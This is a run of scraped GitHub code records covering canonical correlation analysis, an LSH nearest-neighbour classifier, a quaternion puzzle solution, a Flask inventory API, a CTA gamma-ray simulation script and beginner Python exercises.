eps_eig)[:, 0]\n\t# This is the thresholded rank.\n\tdim_svd = tf.cond(tf.size(idx3) < dim, lambda: tf.size(idx3), lambda: dim)\n\n\treturn tf.reduce_sum(tf.sqrt(E3[-dim_svd:])), E3, dim_svd\n\n\ndef inf_CCA(self, y1, y2, mode, est_CCA=False, dim = -1):\n\tglobal debug_mode\n\tdebug_mode = self.selfargs.debug_mode\n\n\tif est_CCA:\n\t\tself.A_cca, self.B_cca, self.m1_cca, self.m2_cca, _= linCCA(y1, y2, dim, rcov1= 1e-4, rcov2=1e-4)\n\n\tPhi_cca1 = np.matmul(y1 - self.m1_cca, self.A_cca)\n\tPhi_cca2 = np.matmul(y2 - self.m2_cca, self.B_cca)\n\n\tif mode == 'tr':\n\t\tself.Phi_tr_cca1 = Phi_cca1\n\t\tself.Phi_tr_cca2 = Phi_cca2\n\telif mode == 'tu':\n\t\tself.Phi_tu_cca1 = Phi_cca1\n\t\tself.Phi_tu_cca2 = Phi_cca2\n\telif mode == 'te':\n\t\tself.Phi_te_cca1 = Phi_cca1\n\t\tself.Phi_te_cca2 = Phi_cca2\n\telse:\n\t\traise ValueError('not a valid inference mode in inf_cca()')\n\treturn Phi_cca1, Phi_cca2\n\n\ndef PCCA(H1, H2, dim, rcov1, rcov2):\n\n\tN, d1 = H1.shape\n\t_, d2 = H2.shape\n\n\t# Remove mean.\n\tmu1 = np.mean(H1, axis=0, keepdims=True)\n\tH1 = H1 - np.tile(mu1, [N,1])\n\n\tmu2 = np.mean(H2, axis=0, keepdims=True)\n\tH2 = H2 - np.tile(mu2, [N,1])\n\n\tS11 = np.matmul(H1.transpose(), H1) / (N-1) + rcov1 * np.eye(d1)\n\tS22 = np.matmul(H2.transpose(), H2) / (N-1) + rcov2 * np.eye(d2)\n\tS12 = np.matmul(H1.transpose(), H2) / (N-1)\n\n\tE1, V1 = np.linalg.eig(S11)\n\tE2, V2 = np.linalg.eig(S22)\n\n\t# For numerical stability.\n\tidx1 = np.where(E1>eps_eig)[0]\n\tE1 = E1[idx1]\n\tV1 = V1[:, idx1]\n\n\tidx2 = np.where(E2>eps_eig)[0]\n\tE2 = E2[idx2]\n\tV2 = V2[:, idx2]\n\n\tK11 = np.matmul( np.matmul(V1, np.diag(np.reciprocal(np.sqrt(E1)))), V1.transpose())\n\tK22 = np.matmul( np.matmul(V2, np.diag(np.reciprocal(np.sqrt(E2)))), V2.transpose())\n\tT = 
np.matmul( np.matmul(K11, S12), K22)\n\t# print(T)\n\tU, E, V = np.linalg.svd(T, full_matrices=False)\n\tV = V.transpose()\n\n\tA = np.matmul(K11, U[:, 0:dim])\n\tB = np.matmul(K22, V[:, 0:dim])\n\tE = E[0:dim]\n\n\tM1 = M2 = np.diag(np.sqrt(E))\n\tW1 = np.matmul(S11, np.matmul(A, M1))\n\tW2 = np.matmul(S22, np.matmul(B, M2))\n\n\tPsi1 = S11 - np.matmul(W1, W1.transpose())\n\tPsi1 = .5 * (Psi1 + Psi1.transpose())\n\tPsi2 = S22 - np.matmul(W2, W2.transpose())\n\tPsi2 = .5 * (Psi2 + Psi2.transpose())\n\n\treturn W1.transpose(), W2.transpose(), mu1, mu2, Psi1, Psi2, E\n\n","repo_name":"Karami-m/Deep-Probabilistic-Multi-View","sub_path":"util/CCA.py","file_name":"CCA.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25432146537","text":"from typing import Dict\nimport numpy as np\nimport random\nimport pandas as pd\nfrom tqdm import tqdm\nfrom collections import Counter, OrderedDict\n\n\nclass LSH:\n \"\"\"\n Implementation of KNN using LSH (Locality Sensitive Hashing).\n Uses cosine similarity to compute distance between vectors.\n \"\"\"\n\n def __init__(self, X: np.array, y, num_hps: int = 5, k: int = 11):\n\n self.set_seed()\n\n self.X: np.array = X\n self.y = y\n self.hash_table: Dict = {}\n self.num_hps: int = num_hps\n self.k = k\n\n # Generate hyperplanes\n self.hps: np.array = np.array(\n [np.random.normal(0, 1, X.shape[1]) for _ in range(self.num_hps)]\n )\n\n def set_seed(self):\n \"\"\"\n Setting the random seed for better interpretability\n \"\"\"\n np.random.seed(0)\n random.seed(0)\n\n def _hash_func(self, vec):\n \"\"\"\n Hash function to generate keys\n \"\"\"\n return tuple(np.sign(np.dot(self.hps, vec)))\n\n def _create_hash_table(self):\n \"\"\"\n Generate hash table putting points in various buckets\n \"\"\"\n for idx, vec in tqdm(enumerate(self.X), total=self.X.shape[0]):\n key = self._hash_func(vec)\n\n if key not in self.hash_table.keys():\n self.hash_table[key] = []\n else:\n self.hash_table[key].append(idx)\n\n def _cos_sim(self, v1, v2):\n \"\"\"\n Compute the cosine similarity between 2 vectors\n \"\"\"\n return np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))\n\n def fit_transform(self):\n \"\"\"\n The training phase for generating hash table\n \"\"\"\n self._create_hash_table()\n\n def _majority_voting(self, classes):\n \"\"\"\n Does majority voting among nearest neighbor\n predicted classes to get the final prediction\n \"\"\"\n max_count = max(list(classes.values()))\n\n preds = []\n\n for k, v in classes.items():\n if v == max_count:\n preds.append(k)\n\n return sorted(preds)[0]\n\n def transform(self, X_test):\n \"\"\"\n Make predictions on the test data\n \"\"\"\n preds = []\n\n for idx, vec in tqdm(enumerate(X_test), total=X_test.shape[0]):\n key = self._hash_func(vec)\n\n # Getting all the neighbors from hash table\n neigh_idxs = self.hash_table[key]\n\n # Computing cosine similarity for each vector\n cos_sims = {}\n\n for idx in tqdm(neigh_idxs):\n v = self.X[idx]\n cos_sims[idx] = self._cos_sim(v, vec)\n\n # Getting the nearest neighbours\n nearest_nn_idxs = np.array(\n list(\n OrderedDict(\n sorted(cos_sims.items(), key=lambda x: x[1], reverse=True)\n ).keys()\n )[: self.k]\n )\n\n preds.append(self._majority_voting(Counter(self.y[nearest_nn_idxs])))\n\n return 
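A quick sanity check for linCCA above, assuming the function is importable from this module: two views built from a shared 2-D signal should yield leading canonical correlations near 1.

import numpy as np

rng = np.random.RandomState(0)
shared = rng.randn(500, 2)
H1 = np.hstack([shared, rng.randn(500, 3)]) @ rng.randn(5, 5)
H2 = np.hstack([shared, rng.randn(500, 4)]) @ rng.randn(6, 6)

A, B, m1, m2, E = linCCA(H1, H2, dim=2, rcov1=1e-4, rcov2=1e-4)
print(E)                    # top canonical correlations, close to 1 here
Z1 = (H1 - m1) @ A          # projections into the shared space
Z2 = (H2 - m2) @ B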
preds\n","repo_name":"Abhiswain97/ML-from-scratch","sub_path":"classification/KNN_LSH.py","file_name":"KNN_LSH.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23462921401","text":"# Python 3\n\n# q = {'1': 0, 'i': 1, 'j': 2, 'k': 3}\n# qb = ['1', 'i', 'j', 'k', '-1', '-i', '-j', '-k']\n\n\ndef transform(a, b):\n \"\"\"Takes string arguments and returns a string\"\"\"\n t = (a[0] == '-') + (b[0] == '-')\n l = a[-1]\n r = b[-1]\n if l == '1':\n ret = b[-1]\n elif r == '1':\n ret = a[-1]\n elif l == r:\n ret = '1'\n t += 1\n elif l == 'i':\n if r == 'j':\n ret = 'k'\n if r == 'k':\n ret = 'j'\n t += 1\n elif l == 'j':\n if r == 'k':\n ret = 'i'\n if r == 'i':\n ret = 'k'\n t += 1\n elif l == 'k':\n if r == 'i':\n ret = 'j'\n if r == 'j':\n ret = 'i'\n t += 1\n if t % 2:\n ret = '-' + ret\n return ret\n\n\ndef combine(l):\n ret = '1'\n for x in l:\n ret = transform(ret, x)\n return ret\n\n\nt = int(input())\nfor tau in range(t):\n l, x = tuple(map(int, input().split()))\n s = list(input() * x)\n if combine(s) != '-1':\n print(\"Case #\" + str(tau+1) + \": NO\")\n continue\n while len(s) >= 3 and s[0] != 'i':\n s = [transform(s[0], s[1])] + s[2:]\n while len(s) >= 3 and s[-1] != 'k':\n s = s[:-2] + [transform(s[-2], s[-1])]\n if s[0] == 'i' and s[-1] == 'k':\n print(\"Case #\" + str(tau+1) + \": YES\")\n else:\n print(\"Case #\" + str(tau+1) + \": NO\")\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_157/800.py","file_name":"800.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"54839868","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nRun this from the root dir folder (the one with the load and IO folders in)\nCreated on Mon Oct 29 11:41:22 2018\n\n@author: mellis\n\n\"\"\"\nimport os\nfrom multiprocessing import Pool\nimport matplotlib.pyplot as plt\nimport gc\n\nfrom IO import Folders as fold\nfrom PLOT import Plot\n\n###############\n# Warning if root folder is set to a folder with other folders in it will crawl \n# the other folders in search of inputs to plot!\nrootFolder = [\"\",\n \"/home/oem/Data/CTMQC/SMALL_NUCL_DT\",\n #\"/scratch/mellis/flavoured-cptk/200Rep_2mol\",\n \"\",\n ]\n\n\n# folders = folders[:1]\nplotting_parameters = [\"|C|^2\", \"norm\"]\nreplicas = 'all'\nplot = True\nnum_proc = 'auto'\nmin_time = 0\nmax_time = 'all'\n#######################################################\n\nfolders = []\nfor rootfolder in rootFolder:\n for dpath, _, files in os.walk(rootfolder):\n if os.path.isdir(dpath):\n possFolder = os.path.abspath(dpath)\n if 'run.inp' in files:\n folders.append(possFolder)\n continue\n\nif not folders:\n print(\"\\t\\t#####################\")\n print(\"\\nSorry I can't find any folders to plot!\")\n print(\"Make sure the run.inp file is in the required folder\")\n\n\ndef do_1_folder(folder, plotting_parameters, replicas, plot):\n p = Plot(plot_params=plotting_parameters,\n folder=folder,\n reps=replicas,\n plot=plot,\n minTime=min_time,\n maxTime=max_time,\n )\n return p\n\n\ndef do_1_fold_PL(folder):\n p = Plot(plot_params=plotting_parameters,\n folder=folder,\n reps=replicas,\n plot=plot,\n minTime=min_time,\n maxTime=max_time)\n return p\n\nif num_proc == 'auto':\n num_proc = len(folders)\n\nif plot:\n all_p = []\n for f in folders:\n p = do_1_fold_PL(f)\n all_p.append(p)\n print(\"Done %s\" % 
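The bucketing in the LSH class above rests on one fact: the sign pattern of dot products with random hyperplanes depends only on a vector's direction, so cosine-similar vectors tend to land in the same bucket. Reduced to a few lines:

import numpy as np

np.random.seed(0)
hps = np.random.normal(0, 1, (5, 3))       # 5 random hyperplanes in 3-D

def hash_key(vec):
    # Bucket key: which side of each hyperplane the vector falls on.
    return tuple(np.sign(hps @ vec))

v = np.array([1.0, 0.2, -0.3])
print(hash_key(v))
print(hash_key(10 * v) == hash_key(v))     # True: invariant to scaling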
f)\nelse:\n if num_proc > 21:\n num_proc = 21\n print(\"Num Proc = \", num_proc)\n if num_proc > 1:\n pool = Pool(num_proc)\n if __name__ == '__main__':\n all_p = pool.map(do_1_fold_PL, folders)\n else:\n all_p = [do_1_fold_PL(folders[0])]\n\n","repo_name":"95ellismle/Plotting-CP2K","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9911591733","text":"#-*-coding:utf-8-*-\nfrom flask import Flask,sessions,request,make_response,jsonify\nimport log\nfrom db import my_md5,PymysqlPool\nfrom code1 import ResponseCode,ResponseMessage\nimport datetime\nfrom user_mode.public import *\nimport re\n\n\n\n\ndef t_goods(request_body,path):\n mysql=PymysqlPool()\n shop_id=request_body.get('id')\n if path=='/select_goods':\n status = request_body.get('status')\n page = request_body.get('page',None)\n pageSize = request_body.get('pageSize',None)\n if page=='' or page==None or pageSize=='' or pageSize==None:\n page='1'\n pageSize = '999999999999'\n start=int(int(page)-1)*int(pageSize)\n stop=pageSize\n limit=\" order by id desc limit {0}, {1}\".format(start,stop)\n select_sql=\"select code_id,shop_id,u_code,goods_id,name,s_code,inventory_quantity,seling_price,unit_pinlei,unit,s_photo,min_num,threshold_remind,status from t_goods where shop_id='{0}' and status='{1}' \" \\\n \"\".format(shop_id,status)\n list1=['name','start_seling_price','end_seling_price','inventory_quantity']\n tmp_sql1=\"\"\n tmp_sql=\"\"\n for i in request_body:\n if i in list1:\n print(request_body.get(i))\n if request_body.get(i)=='' or request_body.get(i)==None:\n continue\n elif i=='name':\n tmp_sql=\" and (name like '%{0}%' or code_id like '%{0}%' or s_code like '%{0}%' or goods_id like '%{0}%') \".format(request_body.get(i))\n elif i=='start_seling_price':\n tmp_sql=\" and seling_price >='{0}'\".format(date_s_date(request_body.get(i),'GMT','day'))\n elif i=='end_seling_price':\n tmp_sql=\" and seling_price <='{0}'\".format(date_s_date(request_body.get(i),'GMT','day'))\n tmp_sql1=tmp_sql1+tmp_sql\n select_sql1=select_sql+tmp_sql1+limit\n select_sql3=\"select count(*) as total from t_goods where shop_id='{0}' and status='{1}' \" \\\n \"\".format(shop_id,status)\n select_sql2=select_sql3+tmp_sql1\n log.LOG.debug('api:{0},sql:{1}'.format(path,select_sql2))\n resluts=mysql.getAll(select_sql1)\n total_sql=mysql.getAll(select_sql2)[0]['total']\n res = dict(code=ResponseCode.SUCCESS,\n msg='查询成功',\n payload=dict(page=start,\n total=total_sql,\n pageSize=stop,\n pageData=resluts,\n key='goods_id'))\n if path=='/insert_goods':\n print(request_body)\n shop_id = request_body.get('id')\n user_id = request_body.get('name')\n user_name = request_body.get('name')\n name = request_body.get('name')\n inventory_quantity = request_body.get('inventory_quantity')\n seling_price = request_body.get('seling_price')\n min_num = request_body.get('min_num')\n unit = request_body.get('unit')\n status = request_body.get('status')\n list1=['code_id','s_code','u_code','s_link','s_photo','type_id','unit_pinlei','threshold_remind']\n list2,list3=insert_sql1(list1,request_body)\n print(list2)\n print(list3)\n select_1 = \"select max(goods_id) as goods_id from t_goods where shop_id='{0}'\".format(shop_id)\n res111 = mysql.getAll(select_1)\n print(res111)\n if res111[0]['goods_id'] == '' or res111[0]['goods_id'] == None:\n goods_id = '10000'\n else:\n goods_id = shop_id+'_'+str(int(res111[0]['goods_id'].split('_')[1])+1)\n 
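The plotting script above builds its Pool at module scope and guards only the map call; the conventional arrangement keeps both behind the __main__ guard, e.g. (work stands in for do_1_fold_PL, and close/join is used instead of a context manager so the sketch also runs on Python 2):

from multiprocessing import Pool

def work(folder):
    return folder.upper()          # stand-in for do_1_fold_PL

if __name__ == '__main__':
    pool = Pool(4)
    try:
        results = pool.map(work, ['a', 'b', 'c'])
    finally:
        pool.close()
        pool.join()
    print(results)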
print(goods_id)\n date=get_date(0,2)\n insert_sql=\"insert into t_goods(goods_id,shop_id,name,inventory_quantity,seling_price,min_num,unit,status,create_time,update_time\" \\\n \"{0}) values('{1}','{2}','{3}','{4}','{5}','{6}','{7}','{8}','{9}','{10}',{11})\".format(list2,goods_id,shop_id,name,inventory_quantity,\n seling_price,min_num,unit,status,date,date,list3)\n print(insert_sql)\n m10=mysql.insert(insert_sql)\n if m10==False:\n res = dict(code=ResponseCode.FAIL,\n msg='SQL-error',\n payload=None\n )\n msg=\"api:{0},error_sql:{1},sql错误\".format(path,insert_sql)\n log.LOG.error(msg)\n return res\n #####插入流水表完成####\n insert_sql111 = \"insert into t_goods_list(goods_id,shop_id,code_id,name,unit,user_id,user_name,Operation_type,create_time) values('{1}_{0}','{1}',\" \\\n \"'{2}','{3}','{4}','{5}','{6}','{7}','{8}')\".format(goods_id, shop_id, '', name, unit,\n user_id, user_name, '进货', date)\n m10=mysql.insert(insert_sql111)\n if m10==False:\n res = dict(code=ResponseCode.FAIL,\n msg='SQL-error',\n payload=None\n )\n msg=\"api:{0},error_sql:{1},sql错误,插入流水表\".format(path,insert_sql111)\n log.LOG.error(msg)\n res = dict(code=ResponseCode.SUCCESS,\n msg='新增成功',\n payload=None)\n if path=='/update_goods':\n shop_id=request_body.get('id')\n user_id=request_body.get('user_id')\n user_name=request_body.get('user_name')\n goods_id=request_body.get('goods_id')\n name=request_body.get('name')\n inventory_quantity=request_body.get('inventory_quantity','')\n min_num=request_body.get('min_num','')\n seling_price=request_body.get('seling_price','')\n type_id=request_body.get('type_id','')\n unit_pinlei=request_body.get('unit_pinlei','')\n unit=request_body.get('unit','')\n threshold_remind=request_body.get('threshold_remind','')\n code_id=request_body.get('code_id','')\n date=get_date(0,2)\n select1=\"select id,goods_id,shop_id,name,inventory_quantity,min_num,\" \\\n \"seling_price,type_id,unit_pinlei,unit,threshold_remind from t_goods where goods_id='{0}'\".format(goods_id)\n mm1=mysql.getAll(select1)\n keys = list(mm1[0].keys())\n keys.remove('id')\n keys.remove('shop_id')\n keys.remove('goods_id')\n print(keys)\n for i in range(0,len(keys)):\n mx=mm1[0].get(keys[i])\n mx1=request_body.get(keys[i])\n if mx1==None:\n continue\n else:\n if mx!=mx1:\n if keys[i]=='inventory_quantity':\n insert1=\"insert into t_goods_inventory_flow(shop_id,code_id,goods_id,inventory_begin,\" \\\n \"inventory_after,inventory_list,create_time,name,user_id,user_name) values(\" \\\n \"'{0}','{1}','{2}','{3}','{4}','{5}','{6}','{7}','{8}','{9}')\".format(shop_id,code_id,goods_id,mx,mx1,int(mx1)-int(mx),date,name,user_id,user_name)\n else:\n Operation_type='将{0}由{1}修改成{2}'.format(keys[i],mx,mx1)\n Operation_type=re.sub('name','商品名称:',Operation_type)\n Operation_type=re.sub('min_num','库存下线:',Operation_type)\n Operation_type=re.sub('seling_price','销售价格:',Operation_type)\n Operation_type=re.sub('type_id','商品分类:',Operation_type)\n Operation_type=re.sub('unit_pinlei','商品品类:',Operation_type)\n Operation_type=re.sub('unit','商品单位:',Operation_type)\n Operation_type=re.sub('threshold_remind','阀值提醒:',Operation_type)\n insert1=\"insert into t_goods_update_table(goods_id,shop_id,code_id,create_time,user_name,Operation_type,name) values(\" \\\n \"'{0}','{1}','{2}','{3}','{4}','{5}','{6}')\".format(goods_id,shop_id,code_id,date,user_name,Operation_type,name)\n print(insert1)\n m10=mysql.insert(insert1)\n if m10 == False:\n res = dict(code=ResponseCode.FAIL,\n msg='SQL-error',\n payload=None\n )\n msg = 
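The handlers above splice request values into SQL with str.format; with a DB-API driver such as pymysql, the safer habit is placeholder binding so the driver escapes values. A sketch only — the PymysqlPool wrapper's own interface may differ, and the column list is abbreviated:

shop_id, status, name_filter = '42', '1', 'tea'    # dummy request values
select_sql = (
    "select code_id, name, seling_price from t_goods "
    "where shop_id = %s and status = %s and name like %s"
)
params = (shop_id, status, '%{0}%'.format(name_filter))
# with a raw pymysql cursor this would run as:
#     cursor.execute(select_sql, params)
print(select_sql, params)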
\"api:{0},error_sql:{1},sql错误\".format(path, insert1)\n log.LOG.error(msg)\n return res\n update_sql=\"update t_goods set name='{0}',inventory_quantity='{1}',min_num='{2}',seling_price='{3}',type_id='{4}',unit_pinlei='{5}',\" \\\n \"unit='{6}',threshold_remind='{7}' where goods_id='{8}' \".format(name,inventory_quantity,min_num,seling_price,type_id,unit_pinlei,\n unit,threshold_remind,goods_id )\n print(update_sql)\n m10=mysql.update(update_sql)\n if m10 == False:\n res = dict(code=ResponseCode.FAIL,\n msg='SQL-error',\n payload=None\n )\n msg = \"api:{0},error_sql:{1},sql错误\".format(path, update_sql)\n log.LOG.error(msg)\n return res\n res = dict(code=ResponseCode.SUCCESS,\n msg='修改成功',\n payload=None)\n mysql.dispose()\n resp = make_response(res)\n resp.headers['Content-Type'] = 'text/json'\n return jsonify(res)\n\n","repo_name":"huaihaizhi1/shouyin_mat","sub_path":"user_mode/t_goods.py","file_name":"t_goods.py","file_ext":"py","file_size_in_byte":9671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26482962760","text":"import gammalib\nimport ctools\nimport cscripts\nimport numpy as np\nfrom ebltable.tau_from_model import OptDepth\nfrom random import uniform\nimport xml_generator as xml\nfrom astropy.io import fits\nfrom xml.dom import minidom\n\ntau = OptDepth.readmodel(model = 'dominguez')\n\ninput_model='NeutrinoAlerts_10000_1e4_transient_100s_MD2014SFR_SC_2.13.out'\n\nimin = 0\nimax = 10000\n\ngam = 2.13\n\nep = 100.\n\nttrans = 100.\n\ntobscta = 600.\n\ndebug = True\nedisp = True\n\ncaldb='prod3b-v1'\nirf='North_z20_average_30m'\n\nhdr = fits.Header()\nhdr['EXTNAME'] = 'Time profile'\nhdr['MJDREFI'] = '59000'\nhdr['MJDREFF'] = '5.0000000000E-01'\nhdr['TIMEUNIT'] = 's'\nhdr['TIMESYS'] = 'TT'\nhdr['TIMEREF'] = 'LOCAL'\n\ndeclination,redshift,A = np.loadtxt(input_model, skiprows=11, unpack=True)\n\nrealsrc=open('nu_src_ts_'+str(int(ttrans))+'s_'+irf+'_'+str(int(tobscta))+'s_'+str(imin+1)+'-'+str(imax)+'.dat', 'w')\nlowrealsrc=open('nu_src_low_ts_'+str(int(ttrans))+'s_'+irf+'_'+str(int(tobscta))+'s_'+str(imin+1)+'-'+str(imax)+'.dat', 'w')\nfakesrc=open('nu_src_fake_'+str(int(ttrans))+'s_'+irf+'_'+str(int(tobscta))+'s_'+str(imin+1)+'-'+str(imax)+'.dat', 'w')\n\nfor i in xrange(imin, imax):\n z = redshift[i]\n if z < 4.:\n delem = uniform(0.,ttrans)\n delal = uniform(20.,80.)\n delrp = uniform(20.,50.)\n tobs = ttrans * (1. + z)\n delobs = delem * (1. + z)\n tsigstart = delobs + delal + delrp\n if tsigstart < tobs:\n lib,doc = xml.CreateLib()\n LCfile = 'LC_nu_'+str(i+1)+'.fits'\n ta=np.empty(500)\n na=np.empty(500)\n for j in xrange(0, 500):\n ta[j]=j\n if ta[j] < tsigstart:\n na[j] = 0.\n elif tsigstart < ta[j] < tobs:\n na[j] = 1.\n else:\n na[j] = 0.\n time = fits.Column(name='TIME', array=ta, format='1D', unit='s')\n norm = fits.Column(name='NORM', array=na, format='1D')\n t = fits.BinTableHDU.from_columns([time, norm],header=hdr)\n t.writeto(LCfile,overwrite=True) \n tsig = tobs - tsigstart\n ra = uniform(0.,360.)\n dec = declination[i]\n ETeV = np.logspace(-2,2.5,45)\n EMeV = ETeV * 1e6\n if z < 0.01:\n atten = 1.\n else:\n atten = np.exp(-1. 
* tau.opt_depth(z,ETeV))\n prefac = A[i] * 1e-13\n spec = prefac * (ETeV / ep) ** (-gam)\n specebl = spec * atten\n sourcename = 'nu'+str(i+1)\n Filefunction = 'spec_nu_ebl_'+str(i+1)+'.dat'\n np.savetxt(Filefunction, np.column_stack([EMeV,specebl + 1.e-300]))\n speci = xml.addFileFunction(lib, sourcename, type = \"PointSource\", filefun=Filefunction, flux_free=1, flux_value=1., flux_scale=1., flux_max=100000000.0, flux_min=0.0)\n spatial = xml.AddPointLike(doc,ra,dec)\n temporal = xml.AddLCTrans(doc, LCfile, 1.)\n speci.appendChild(spatial)\n speci.appendChild(temporal)\n lib.appendChild(speci)\n \n bkg = xml.addCTAIrfBackground(lib)\n lib.appendChild(bkg)\n\n open('nu_sources_'+str(i+1)+'.xml', 'w').write(doc.toprettyxml(' '))\n \n foutmodel='nu_'+str(i+1)+'_ts.xml'\n \n sim = ctools.ctobssim()\n sim['inmodel'] = 'nu_sources_'+str(i+1)+'.xml'\n sim['caldb'] = caldb\n sim['irf'] = irf\n sim['outevents'] = 'events_nu_'+str(ttrans)+'s_'+irf+'_'+str(int(tobscta))+'s_'+str(i+1)+'.fits'\n sim['ra'] = ra\n sim['dec'] = dec\n sim['rad'] = 5.0\n sim['tmin'] = '2020-05-31T12:00:00'\n sim['tmax'] = '2020-05-31T12:10:00'\n sim['emin'] = 0.02\n sim['emax'] = 199.0\n sim['maxrate'] = 1.0e9\n sim['debug'] = debug\n sim['edisp'] = edisp\n sim.execute()\n\n like = ctools.ctlike()\n like['inobs'] = 'events_nu_'+str(ttrans)+'s_'+irf+'_'+str(int(tobscta))+'s_'+str(i+1)+'.fits'\n like['caldb'] = caldb\n like['irf'] = irf\n like['inmodel'] = 'nu_sources_'+str(i+1)+'.xml'\n like['outmodel'] = foutmodel\n like['debug'] = debug\n like['edisp'] = edisp\n like.execute()\n \n outfile = minidom.parse(foutmodel)\n srcs = outfile.getElementsByTagName('source')\n ts = float(srcs[0].attributes['ts'].value)\n srcsp = outfile.getElementsByTagName('parameter')\n normsp = float(srcsp[0].attributes['value'].value)\n normsp_error = float(srcsp[0].attributes['error'].value) \n \n if ts >= 25.:\n if normsp > 2. or normsp < 0.5:\n fake = str(i+1)+' '+str(ts)+' '+str(normsp)+' '+str(normsp_error)+' '+str(ra)+' '+str(dec)+' '+str(tsig)+'\\n'\n fakesrc.write(fake)\n else:\n real_nu = str(i+1)+' '+str(ts)+' '+str(normsp)+' '+str(normsp_error)+' '+str(ra)+' '+str(dec)+' '+str(tsig)+'\\n'\n realsrc.write(real_nu)\n else:\n lowreal_nu = str(i+1)+' '+str(ts)+' '+str(normsp)+' '+str(normsp_error)+' '+str(ra)+' '+str(dec)+' '+str(tsig)+'\\n'\n lowrealsrc.write(lowreal_nu)\n\nrealsrc.close()\nlowrealsrc.close()\nfakesrc.close()\n","repo_name":"Konstancja/cta-neutrino","sub_path":"nu_trans_simlike.py","file_name":"nu_trans_simlike.py","file_ext":"py","file_size_in_byte":5570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71011824194","text":"# Introduction to Python\r\n\r\n#####################################################################################################################################\r\n\r\n'''\r\n1.\r\nWrite a program which will find factors of given number and find whether the\r\nfactor is even or odd. Hint: Use Loop with if-else statements\r\n'''\r\n\r\nprint('Answer for Question 1 Begins ')\r\n\r\nclass UnAcceptedValueError(Exception):\r\n def __init__(self, data):\r\n self.data = data\r\n def __str__(self):\r\n return repr(self.data)\r\n\r\nwhile True:\r\n try:\r\n input_number = int(input(\"Enter a natural number : \"))\r\n if input_number<=0:\r\n raise UnAcceptedValueError(\"Sorry entered number cannot be less than 1 ! 
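The source spectrum in the CTA script above is a power law attenuated by exp(-tau(z, E)) from ebltable; with a toy optical depth standing in for tau.opt_depth, the construction reduces to:

import numpy as np

gam, ep, prefac = 2.13, 100.0, 1e-13
ETeV = np.logspace(-2, 2.5, 45)
tau_toy = 0.1 * ETeV                               # stand-in for tau.opt_depth(z, ETeV)
spec = prefac * (ETeV / ep) ** (-gam) * np.exp(-tau_toy)
np.savetxt('spec_toy.dat', np.column_stack([ETeV * 1e6, spec + 1e-300]))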
Please try again ...\")\r\n break\r\n except UnAcceptedValueError as e:\r\n print(\"Received error:\", e.data)\r\n except ValueError:\r\n print(\"No valid natural number entered ! Please try again ...\")\r\n print(\"Hint : Natural number starts with 1 !!!\")\r\n\r\ncounter=1\r\nfactors_of_input=[]\r\nwhile input_number>=counter:\r\n if input_number%counter==0:\r\n factors_of_input.append(counter)\r\n counter += 1\r\n else:\r\n counter += 1\r\n continue\r\n\r\nlen_of_factors=len(factors_of_input)\r\n\r\nif len_of_factors%2==0:\r\n even_or_odd='Even'\r\nelse:\r\n even_or_odd='Odd'\r\n\r\nprint('Factors of input number',input_number,'are :',factors_of_input,'& the factor is',even_or_odd)\r\nprint('\\n')\r\n\r\n#####################################################################################################################################\r\n\r\n'''\r\n2.\r\nWrite a code which accepts a sequence of words as input and prints the words in a sequence after sorting them alphabetically.\r\nHint: In case of input data being supplied to the question, it should be assumed to be a console input\r\n'''\r\nprint('Answer for Question 2 Begins ')\r\n\r\ninput_word=str(input(\"Enter a word : \"))\r\nintermediate_word=(input_word.split(sep=\" \"))\r\nold_word=intermediate_word\r\nintermediate_word.sort(key=lambda y: y.lower())\r\nsorted_word=' '.join(map(str, intermediate_word))\r\nprint('Word before sorting : ',input_word)\r\nprint('Word after sorting : ',sorted_word)\r\nprint('\\n')\r\n\r\n#####################################################################################################################################\r\n\r\n'''\r\n3.\r\nWrite a program, which will find all the numbers between 1000 and 3000 (both included) such that each digit of a number\r\nis an even number. 
The numbers obtained should be printed in a comma separated sequence on a single line.\r\nHint: In case of input data being supplied to the question, it should be assumed to be a console input.\r\nDivide each digit with 2 and verify is it even or no\r\n'''\r\n\r\nprint('Answer for Question 3 Begins ')\r\n\r\nfor i in range(1000,3001):\r\n split_numbers = [int(j) for j in str(i)]\r\n if ((split_numbers[0] % 2 == 0) and (split_numbers[1] % 2 == 0) and (split_numbers[2] % 2 == 0) and (split_numbers[3] % 2 == 0)):\r\n listToStr = ''.join(map(str, split_numbers))\r\n print(listToStr, end=\",\")\r\n else:\r\n pass\r\n\r\nprint('\\n')\r\n\r\n######################################################################################################################################\r\n\r\n'''\r\n4.\r\nWrite a program that accepts a sentence and calculate the number of letters and digits.\r\nSuppose if the entered string is: Python0325 Then the output will be:\r\nLETTERS: 6\r\nDIGITS:4\r\nHint: Use built -in functions of string.\r\n'''\r\nprint('Answer for Question 4 Begins ')\r\n\r\ntext_input=input('Enter a Letter: ')\r\n\r\nnumeric_count=0\r\nalphabet_count=0\r\n\r\nfor letter in text_input:\r\n if letter.isnumeric()==True:\r\n numeric_count+=1\r\n elif letter.isalpha()==True:\r\n alphabet_count+=1\r\n else:\r\n pass\r\nprint('LETTERS: ',alphabet_count)\r\nprint('DIGITS: ',numeric_count)\r\nprint('\\n')\r\n######################################################################################################################################\r\n\r\n'''\r\n5.\r\nDesign a code which will find the given number is Palindrome number or not.\r\nHint: Use built -in functions of string.\r\n'''\r\nprint('Answer for Question 5 Begins ')\r\n\r\nwhile True:\r\n try:\r\n user_input = int(input(\"Please Enter a non negative number : \"))\r\n user_input_string = str(user_input)\r\n my_list = []\r\n for number in user_input_string:\r\n my_list.append(number)\r\n\r\n reversed_user_input = list(reversed(my_list))\r\n\r\n combined_reversed_string = ''.join(reversed_user_input)\r\n 